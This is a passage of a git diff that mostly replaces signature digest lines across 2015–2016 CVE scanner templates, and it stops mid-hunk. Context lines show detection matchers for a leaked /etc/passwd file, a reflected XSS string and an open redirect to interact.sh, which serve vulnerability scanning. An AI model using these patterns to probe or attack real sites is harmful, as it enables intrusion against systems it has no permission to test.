4a0a00473045022100866d5eff7742d789f41a4867f48adbec1a0479711bea2ad8801931cff1c1b37802204b0a0e2cce57ccffd4a552b3b99ea5e46548ab7e27a42535f5ece2d7e0c0219e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022052977067121fabeb3e355636a24726ed71e2eda40d0a64bf022f66ee9801f5a6022100caa7bb2d4f4df06d4ed127e0543565b68a1fd3711bab080afef97b2a24e4cea8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-6544.yaml b/http/cves/2015/CVE-2015-6544.yaml index f00a6722fd..cb09e759c9 100644 --- a/http/cves/2015/CVE-2015-6544.yaml +++ b/http/cves/2015/CVE-2015-6544.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022017d6b01685ee7039b3c1ab4d5fbff148d05b2d07d85ea8f2ad7ae12bc3194ea30220706ca8443651a6c1865a506e57899af509da50a25945fddb5da93dda014b96fd:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a0048304602210099882d875709ce77372ea63ddb508ba435cacf6e20bfeeec4eb747f63e3a74b20221009e285274fd1f0ce4680a5fd66fee457bf539a3bc6bd30cf7e8f821cb937da4e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-6920.yaml b/http/cves/2015/CVE-2015-6920.yaml index 81bec92887..85741c7c9b 100644 --- a/http/cves/2015/CVE-2015-6920.yaml +++ b/http/cves/2015/CVE-2015-6920.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100a247ebd54ed2b23956ca5dedbcb68388eb63023933e17f5c015bb4a6a39b99d70220133c1249035141548540adc1356d34ac920bcddc2185f5bdc492b71ccc62bde9:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100aced96938d062d0799c32b92ae174932fdc219f388280360cb4a5cb06a5b31e2022053a6ea52e8bc4b5d8ff98d06d5c5f5e75ecf0ad65f49933a0b37d23a6615f713:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-7245.yaml b/http/cves/2015/CVE-2015-7245.yaml index 68ef275978..f7f0e14b52 100644 --- a/http/cves/2015/CVE-2015-7245.yaml +++ b/http/cves/2015/CVE-2015-7245.yaml @@ -39,5 +39,4 @@ http: part: body regex: - "root:.*:0:0:" - -# digest: 4b0a00483046022100d9fb5acfa1c9d16bda4759c4dfd36c5a72ec84f7ce94f22e9dd120e0eb40b550022100994badeceba0315e93b79732fd74be2f23262664ed53dab343e73dccfca7f8eb:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c60897313525a874310900f1eece1d6e28b7ed615b9f73cb64cba8ed497f5c2b0221008ea5c5f6ef608fa09cf3c9af63df22d2f18afd689a277f880ec5266d4346500a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-7377.yaml b/http/cves/2015/CVE-2015-7377.yaml index 32563de3f5..ccbf6855d6 100644 --- a/http/cves/2015/CVE-2015-7377.yaml +++ b/http/cves/2015/CVE-2015-7377.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100f54a1ab5b34681938c75b5263f75f241e5170e702e445a93bcb3c2dcc15016200221008c48edd5e5b7413e2116e2c000ce47c6c2bc1da0713db3038557c9f753d6e3d9:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100a57be0109ba0a0672379bd13b16a25b3d69572633453bd8143607ddb741b7c01022100f5d5c00ba8912ae7001b2b3fc060bad8da110738c84df18c54f4e5adacee0efb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-7450.yaml b/http/cves/2015/CVE-2015-7450.yaml index 00171b5894..6e7160b530 100644 --- a/http/cves/2015/CVE-2015-7450.yaml +++ b/http/cves/2015/CVE-2015-7450.yaml @@ -66,5 +66,4 @@ http: - type: status status: - 500 - -# digest: 490a00463044022027c2528e6613828ef6bd30278e4fc4f1152acb839422e3651b93ecb93ba76fbf022017352754d0e783839d7e93ef8e7be239bbe8689978d7e0dd14b3bf384d28069a:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022023e11869c972c1eb3e7168753defebf4eefa53b12e9927dccf898a864a6cbb30022075b27ec3dd9a1a3d93f3508694b71b9e23bd15310f37ad73828d6ed418199797:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-7780.yaml b/http/cves/2015/CVE-2015-7780.yaml index 7f4c2b47be..4dc8000bc4 100644 --- a/http/cves/2015/CVE-2015-7780.yaml +++ b/http/cves/2015/CVE-2015-7780.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100f86e085917cb6d529b3db79821b1457a3b7a29590197decaa6448b87711a63a40220070b0764cb6c59e8071ca1efc77f0f0630eab9ea62eca2fc0b3c909e1e097038:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502200b125fb77e61aacca279244125cb998beae0256fd56d7e059cafa9e2da942195022100bf9399e83e58677e317efa4b1c0ffae7147fcbb5a67b3e140859918e9e703e01:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-7823.yaml b/http/cves/2015/CVE-2015-7823.yaml index d2c7ceb10e..cbbf82dbb7 100644 --- a/http/cves/2015/CVE-2015-7823.yaml +++ b/http/cves/2015/CVE-2015-7823.yaml @@ -35,5 +35,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' - -# digest: 490a0046304402207b9e27bc8b5546bd935b562562ce81fabb84b99abf732693093b98235ca25432022047041f9f036e6cd199f601c369f7cdaf2804700ce7674273df5a370a47e3300e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502204a03aa030b35079de10bd4e988fad3c1c34760ef84c42026098db3b49e1a50de022100ffc83adc21bb8d02a65ce424e0745bb3c21ca44aa4ffd33e49d2167afbd4a08b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-8349.yaml b/http/cves/2015/CVE-2015-8349.yaml index 4534ef4eb5..9104b2b2b2 100644 --- a/http/cves/2015/CVE-2015-8349.yaml +++ b/http/cves/2015/CVE-2015-8349.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100a253b67b49ce68b1cea72c816c3a2f5ed7a8002aa7fbc2b6724c0dd03107183d0220163171367159a05902e47d2ded92f71a9870d38fd1acc536cc04498f81d0200e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502205c29c4d3ec8dfd843e48e78a9d122dc3969c316f634871ce0dcf6770c2d3d5da022100e2ac6afbc4c8312a802621b6aa4288a98c3cedf9b368b36eb9fcfa52b2cb82b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-8813.yaml b/http/cves/2015/CVE-2015-8813.yaml index 98aa1a5dd2..dfb803a475 100644 --- a/http/cves/2015/CVE-2015-8813.yaml +++ b/http/cves/2015/CVE-2015-8813.yaml @@ -37,5 +37,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - -# digest: 4b0a00483046022100e13a539d93579d62d4e3bcc7d4780c36b1e66286010e334ab37549d46c921dea022100b0d76920dbaddf6fa253d4e05a142e73d8f9c1f81d49829b68eebd0591cd73c4:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402203788000c470eaab531dfcbd09628e96a09c4a9370e79ed92cb6240272bd1938c0220111d9d54c36e8b5cbf43d2e2fc69cc8cc3a268ff0dd191637fbc3c9374d4c25f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-9312.yaml b/http/cves/2015/CVE-2015-9312.yaml index ef815670c1..79ed923287 100644 --- a/http/cves/2015/CVE-2015-9312.yaml +++ b/http/cves/2015/CVE-2015-9312.yaml @@ -48,5 +48,4 @@ http: - 'contains(body_2, "<img src=x onerror=alert(document.domain)")' - 'contains(body_2, "newstatpress")' condition: and - -# digest: 4b0a0048304602210097a23d9e99981aede2a0893cba3cf034b3ccec364da47fe1829ec4ed3dfb7336022100933386cccfe8e463c6985d702c4ade5fb6f373efaf82d052057cc571f00e51b5:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220330815d2c2416c76b691ca3fffcb77483cb6d6cff186aa2d2018f93e0938f46a0221008d7d727d5346aea4503965af05851942240f45c9ef163dd5dd5f4d3e1989885f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-9323.yaml b/http/cves/2015/CVE-2015-9323.yaml index c1da0b7360..f13cbcd55b 100644 --- a/http/cves/2015/CVE-2015-9323.yaml +++ b/http/cves/2015/CVE-2015-9323.yaml @@ -49,5 +49,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "404-to-301")' condition: and - -# digest: 4b0a00483046022100ec6d3e8c56dae2eed4add9ee8145a882d989331a2071f7a21c03db48ad37dc5e022100832bbc4359c889958a0636018f1501a0ec0a546a8e0c8b2c898cbaed6a437026:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502200ac7e2456402b381e3cfebf7f0d444bcf44271943dc60bf2d078cab4d9c0dd89022100afae7b4d327465ae8ba9899f096ef73c35951d1cea065bb419956370bcc696b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-9414.yaml b/http/cves/2015/CVE-2015-9414.yaml index 2026eee0f6..ee9e3f838c 100644 --- a/http/cves/2015/CVE-2015-9414.yaml +++ b/http/cves/2015/CVE-2015-9414.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100a0e2ca8f434195d6501eb10956322c22dd0edb699df22d9026c7136bd90ada8d022100fb1a9c73f33c2a966bb183827ab57946ece670ff4302485000ef46a36ddfb7c2:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402201fec671d76a8eaabf3188f976bd91fa6f503844db3cb87e793b5ec48c5298e44022015bc9a68b9a8b942392860ff1fd8b556b81f973a21de1be7010d948e999fa3d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-9480.yaml b/http/cves/2015/CVE-2015-9480.yaml index 5a68a2ec7a..aafe829669 100644 --- a/http/cves/2015/CVE-2015-9480.yaml +++ b/http/cves/2015/CVE-2015-9480.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402203e60af5007947fc9d657eb97ee24e2173aa2af153f2e6c752604b9cf558edf1802204ef5882d6e700540da6f0d7da627d2942749781054af1f4b1651a7e2aaaa138c:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402206b1bb9e8de654d9b0a586c36c6a6ab1c454912dca9434e08dbb2722bcf77e463022009492f539b48263acc88f15967fd39c45fca2b2cc2da70e59a810b5411776795:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-0957.yaml b/http/cves/2016/CVE-2016-0957.yaml index b346503be3..44f80e7ccb 100644 --- a/http/cves/2016/CVE-2016-0957.yaml +++ b/http/cves/2016/CVE-2016-0957.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022034d700b28d76a2285cf39808dd87b46a25e3f8d37516a98f06ed84e32f9c682a022100ad6b5b8e670244783bc7b1c04a91a24bde217b671345e5ec9379d5a595c42113:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022004f8eff912040eea679cc5fc56bdc5a143807f83e3070446e5ca7436703bc22c02201d33039b8c4220f0b87ab636049a0fd4cb7b1cf8db3fa327a3eba8590f9118fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000126.yaml b/http/cves/2016/CVE-2016-1000126.yaml index 3714e2b70b..44b9b19c53 100644 --- a/http/cves/2016/CVE-2016-1000126.yaml +++ b/http/cves/2016/CVE-2016-1000126.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402203128720d32c7abcb28fb3e7c6c1b734ac62e71d2e93d1de2b775753e9e0b6c3702202792d5ec28008305d7ce33e77b58c2b555a85c1145a5d9c99c762fbefe289d30:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e980fef41ac4b110697b76c651db707d3e5c90d755d7f7feaabd79991a7a88430220234c1ac1aa612f1451e92bbf248ba2f148a2095f0ac20bebf73faeee6d6ac569:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000127.yaml b/http/cves/2016/CVE-2016-1000127.yaml index a78e72d77c..d495bcdecd 100644 --- a/http/cves/2016/CVE-2016-1000127.yaml +++ b/http/cves/2016/CVE-2016-1000127.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100a0eb2d250740131e0bfa846392b68fc4c8599ffaf91c72943af02fd3b3e60ad1022100badb9e5583bd85d89cfb3579acdd9a96b88de574700780918290501758cdd9a2:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502201a366bdf022d2e1741eb073f8513af17f20fa7fd63bc43c0abaae1da9f2c3a860221008a166c0974bbeefe344bcf82cbfcb3a01e0e5dcc8f719c1e0198c396598269ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000128.yaml b/http/cves/2016/CVE-2016-1000128.yaml index bee776064d..c5130787d2 100644 --- a/http/cves/2016/CVE-2016-1000128.yaml +++ b/http/cves/2016/CVE-2016-1000128.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100e96ca111f89892ffdfffd1e134e5913664dd5aee5900437011e6eb90a946695402202ce4b5b9f9309a39e9e4f54e7c886247431d3231ef07f686446e0bb3b4c816c8:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402203c6febcc6bdf7fd80250fa2354bb2943dfad5dedbc8cc44aba9bee00cdbded7802206da6fec0905231f51517ac6c602d68167e1786f3fc86e030ebd9f5cf43c6371e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000129.yaml b/http/cves/2016/CVE-2016-1000129.yaml index f9277d58b7..9e872700a3 100644 --- a/http/cves/2016/CVE-2016-1000129.yaml +++ b/http/cves/2016/CVE-2016-1000129.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402204223ff441447c0c658ed4a9241989dc66a1569a9a5a8f3e906d53697f1fd49510220726bc2a2ce195bd97c3c1ec4ec2cbd572a73345a1bb7fb55188767a824d61270:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100afd18903a0e5958b4ff6c58a6a26719a09301e7414befe5dd84a5d88dc732f6b02206771fca2229fd604fd0071fd9c7870c1ac9cae4f5953f8f5e6bf933b7e4ae804:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000130.yaml b/http/cves/2016/CVE-2016-1000130.yaml index c062ee382c..1a1c12abdf 100644 --- a/http/cves/2016/CVE-2016-1000130.yaml +++ b/http/cves/2016/CVE-2016-1000130.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100ddcc26c3f08f7cb03d794f612ccc5a31377f950073359c1c546ad0fa6b80e05c022100d73d10fd73fd6881ac9c3f16819cfbcd2f19c70c430298f4d817c13aac7d206b:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402201093b85107e899eaa9ef9b9cbe2c6470e137b3b12e8f5d9f6d89870f53b9abba022076e7b2e88bbee1e4d91e1c5a90d792d952edc6e00c337d384a0e976ba831e415:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000131.yaml b/http/cves/2016/CVE-2016-1000131.yaml index 6c198a6715..f5d67476c8 100644 --- a/http/cves/2016/CVE-2016-1000131.yaml +++ b/http/cves/2016/CVE-2016-1000131.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402202adf9d7bffc6cabb56a53d59b131ca70e4b8a4d58b246d8446ae97ce34bef6c702206cd33be0a1603e34da29088529c6f4b66005ab3b5d94b4005956f717daa54b9d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100f2cac51c1986cdcb6378e241047d92838aa693adfe3e0b6da8e43dfbca10bf5e022050c936e21605117e49772e0a3e6d4c8ba99998317aeaf11e9561735539c7f7de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000132.yaml b/http/cves/2016/CVE-2016-1000132.yaml index b131183d96..ec9f4cd8f2 100644 --- a/http/cves/2016/CVE-2016-1000132.yaml +++ b/http/cves/2016/CVE-2016-1000132.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100e02beefb0a2b6ac6088ec337510c18d2ea6698641c10120754f55670fe988e2b022100b27d8c801ca02ecffe85a71909ea348cb9ed065e551750af53cbaef16a65bbdd:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022070b51f1e21fdb8ad29fe680c9c9f16e5422ba95c92f889a27b788df72de11876022100d39e2c0faf029e3c0050cc5cee420d91742841e6bc0da33e04ebe10d9d9c6988:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000133.yaml b/http/cves/2016/CVE-2016-1000133.yaml index d059101c60..e5ec4aee2d 100644 --- a/http/cves/2016/CVE-2016-1000133.yaml +++ b/http/cves/2016/CVE-2016-1000133.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502206e8b18a4af0b61eff89bcfd7c42e40eba07dabe90e4e8222d47bf798f36dfb4d0221009569aa79df67bcb27850d475454627b0e16a581bea5bedda6cc81abc39a84a16:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100afbc9afa2fe292a0142c4c2a91b435819e170dd8c4ae83c156d856db735124e4022058b6373e1c0359c67e4dc781626564312896a33ece223f07ba41331dc231d27b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000134.yaml b/http/cves/2016/CVE-2016-1000134.yaml index 8412b698b7..6c046e8f82 100644 --- a/http/cves/2016/CVE-2016-1000134.yaml +++ b/http/cves/2016/CVE-2016-1000134.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502210093c51976ca1389bd875addfce3021b845d28f3db4f266448b93c2f1d2fa61a1c02200e267960b732cfdbc5e96c4ba1704985162044e05e897c4a1f96b9b4719d9587:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100fbc78e937effa1c4617a2bb03bc02d28b6fd77e2e003f029f42868d207ecbf0102206bc19eb6c385e3728c51bf4a0b8526b906abbbb327469020b415abc6e64cfbbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000135.yaml b/http/cves/2016/CVE-2016-1000135.yaml index dbe9ed03f0..c2e51ac164 100644 --- a/http/cves/2016/CVE-2016-1000135.yaml +++ b/http/cves/2016/CVE-2016-1000135.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4b0a0048304602210099b4abf146b9ddad7fb3a24b1eac28b313db3aa6f82315760701b4da84f96d15022100e6582c64f1afce7a50ab4a9a96c1a6cd1ccfb88f8696b0d6cc1bfb9f75997ed8:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e30394bb2fb6b54c9ed718d250e62f828e36acbd454a7e888933878b0ab00fc002206aee96693ba0ee3369b48905ac06097348ceb0545f038079dc93aaab4b9483d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000136.yaml b/http/cves/2016/CVE-2016-1000136.yaml index 969d06af49..3404d1d77d 100644 --- a/http/cves/2016/CVE-2016-1000136.yaml +++ b/http/cves/2016/CVE-2016-1000136.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502203b639f0cbfd4ce96865c406d01191aa2950fed6e96a69c7e5a3db8c088258f38022100ea1ba0e32df5da85e30c06cfbf099af7400f9430c71ab6625a6e465aef2b5b4a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502205ea0a9ef246eef78a2223983b8493f0aa406c09a26a3978df58f85d1168788350221008360bb506d636ad8fc878a70174fd573d7465d4bba88cb76d46a4d21b34c229c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000137.yaml b/http/cves/2016/CVE-2016-1000137.yaml index 4937db8a6d..7f913b9c66 100644 --- a/http/cves/2016/CVE-2016-1000137.yaml +++ b/http/cves/2016/CVE-2016-1000137.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100ec5f84f7f1cd911fde1baf7b989fad0400e41d74c6a9905f67ed3e3e5172dd0e02201a0e17a90de8094139a0047b132b9847cca3c7acc8e207c54bbb8196195c53b7:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100c4be55ea965811c19d1d06232877cc45af52f4dc62b518ece3e4977d5ba912b002202b29a56953ed4937b0582b68a36f04ba91f0825874ffbb8746286075a92106e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000138.yaml b/http/cves/2016/CVE-2016-1000138.yaml index 12f021644a..5be16867ce 100644 --- a/http/cves/2016/CVE-2016-1000138.yaml +++ b/http/cves/2016/CVE-2016-1000138.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100913f5d5c1920b50f0bdf93ab6fae0fb5eb85286ffedb89bb34f28da6013ee4ca022100975189bf1c4c738bf9cf35c7a878f84e0cae842f037b7bcc7045dfcb9ddcc36f:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022038c1a03ab7503f22e99e0c634537283fce3ccba10c205e46be560fa49fba871102207b78dbb122fc59c4c6196ff446436990f3923488a91e03d1bbe793c4acfe328e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000139.yaml b/http/cves/2016/CVE-2016-1000139.yaml index 656b2f8c1f..035bdb962c 100644 --- a/http/cves/2016/CVE-2016-1000139.yaml +++ b/http/cves/2016/CVE-2016-1000139.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502202c5ca88b4c341c1b68e5c089cef05b35198e0f64c0d773c3d7b1844fceefa0430221009be08c35525ec95d9d0c6f65aa0c243a9af3ee5a3852f543c2eddc05b0d36924:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022059f142c44e0b572b0162a81d2bb2a65f0b72df161c123439761badf49a1fb14f022100c16d25e669a1b9311f04f76ccdb32b656f18b8c90a74267a7fa5a9fda90c7f82:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000140.yaml b/http/cves/2016/CVE-2016-1000140.yaml index 8e89094314..e7c40fa5f4 100644 --- a/http/cves/2016/CVE-2016-1000140.yaml +++ b/http/cves/2016/CVE-2016-1000140.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502206bcc05fe8507e8240a74e664ebbed126f601ff4934353801ae18623fee5f7a6c022100bae18318293b135fab8dab6ac8c0d054bccc1d57dd8231d9ca871d70727a0887:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d2e9f1913796d3dc9824bd3fbc34fd1df7e5f832cbef7b6c8b2ff7a3bfc5649e022100ea61d8616f0168d6d4678e4d0d2888c023d8b3a9fe38bb8a41fafb0a86236663:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000141.yaml b/http/cves/2016/CVE-2016-1000141.yaml index b4b3770f23..6b694b1c20 100644 --- a/http/cves/2016/CVE-2016-1000141.yaml +++ b/http/cves/2016/CVE-2016-1000141.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502210080a6b75912e6a34b284ef6df8de22a7fc122d4bdc7c372edf5e44f7bcc6df0b0022019412470cded76c473c995fd3126987b0ad2823f47c5ad0499a56717c4c7491e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502202291e0cce841553aea4295a451be9a3e1a8ed028b588dc4c53a803d9048e818b02210090c2dae6857eb50d3f5914e7f85871a789fb5a83b2afd3ce512d86fe19e6d11c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000142.yaml b/http/cves/2016/CVE-2016-1000142.yaml index 208412bd4a..537a88f43d 100644 --- a/http/cves/2016/CVE-2016-1000142.yaml +++ b/http/cves/2016/CVE-2016-1000142.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100d76bd53315479d2c266703091d07b254ecb3d5d254d0a018382516081e5b569e022100f3e3983db6942fad517f61ac7c28df8e032108b278bea20bc10dc33ca34fa05a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100f9270eced92e5080b30ef8df3442c9b4d3330dec0c19786f8c9ae3db0d71b47b02206ecae5e18c374d150793085eeb3c2bc03aca2dbe9c237718296de80a7e1b9f60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000143.yaml b/http/cves/2016/CVE-2016-1000143.yaml index e160ce582c..b1e783457e 100644 --- a/http/cves/2016/CVE-2016-1000143.yaml +++ b/http/cves/2016/CVE-2016-1000143.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100cd60f94a2e7cb8f841ef850e2b97a1185986581d8435e1e7c846973753dba1e702203427c0b749b17527ea98c0d1d385eee3c202424a881bc16effb6ed913ee85356:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100cc01657a1c0898d76302c2a423b8577659cac1bff09822c512b8667a9a0f3fa8022100ecfd30c8f3787c0efa08ad875dc3814374f5b80a2efa3e458e9a241f5be6903e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000146.yaml b/http/cves/2016/CVE-2016-1000146.yaml index 926a42d3db..a47f20001a 100644 --- a/http/cves/2016/CVE-2016-1000146.yaml +++ b/http/cves/2016/CVE-2016-1000146.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220781fc614c0618e519539125adc8e9574d4bcad2dabf266723190bc1d405b42c90221009c0b6ebb844e7656c0cd690dc66da747699d67c5a6b98807ea06ffdf2c6c7eed:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022045990ddb01f38116ff77f3ec8d906b41bb069ac818526795879b8f180034f6b5022100b7b4526f3261e7f6da32c731144f6c8ddf7c0b3bbd0b1903f7aedf207fd391dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000148.yaml b/http/cves/2016/CVE-2016-1000148.yaml index ba2beeaefe..58a4e50d14 100644 --- a/http/cves/2016/CVE-2016-1000148.yaml +++ b/http/cves/2016/CVE-2016-1000148.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502210092b8b08e849df030bb748ebfc692917ca13334d17ed9ee2e017ecc62af77fb85022038baa8add873c8c2c295e2e6fdd0b9c17517bd7d47c9268e3beaab665adda05e:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100b73a03b0d261d07755b985161f468f906267b7ac71427452884eb0fecd86ebd1022100c15cc107373b7d5cf829f62fc005ae817624111394e97e25b8c1f24b4a34b51d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000149.yaml b/http/cves/2016/CVE-2016-1000149.yaml index 28163c322e..246725edc2 100644 --- a/http/cves/2016/CVE-2016-1000149.yaml +++ b/http/cves/2016/CVE-2016-1000149.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220515eeac03add63efd98ad93c924a12a4f2b188c83e2d65e00c031bbad1b859bd02204a7e3fc669682fd927cab82a7121276128d70f33f7f578c002f41e308952b88c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502205c344f59f76170818d1b390d890c086b9b39513510e4e720a1e6bf5b02bc0f38022100ebbeabcef48efba138f11e0df4ff5edbe1dfb66f4421ef68c2dfcc96d9cf6923:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000152.yaml b/http/cves/2016/CVE-2016-1000152.yaml index 1e88d5ad9f..b2118330d8 100644 --- a/http/cves/2016/CVE-2016-1000152.yaml +++ b/http/cves/2016/CVE-2016-1000152.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502205b4e936430655f5be8d0e6a3fbf614cebec962b8ef2790a19eedaef314421764022100f176d00a1d078e9eddc29e6e360fffc41310001f2eee7e50f3cba78115e18380:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100ca820f1e3be4475ca53cc742290b1c0a6ee2c6330c0eb42ab66a256210ebe414022100e97753e64ec83b76430f3f06fa4078e8fedd880125acedc4f4c5de4b674e8f60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000153.yaml b/http/cves/2016/CVE-2016-1000153.yaml index 498f1ce6c3..5a474de474 100644 --- a/http/cves/2016/CVE-2016-1000153.yaml +++ 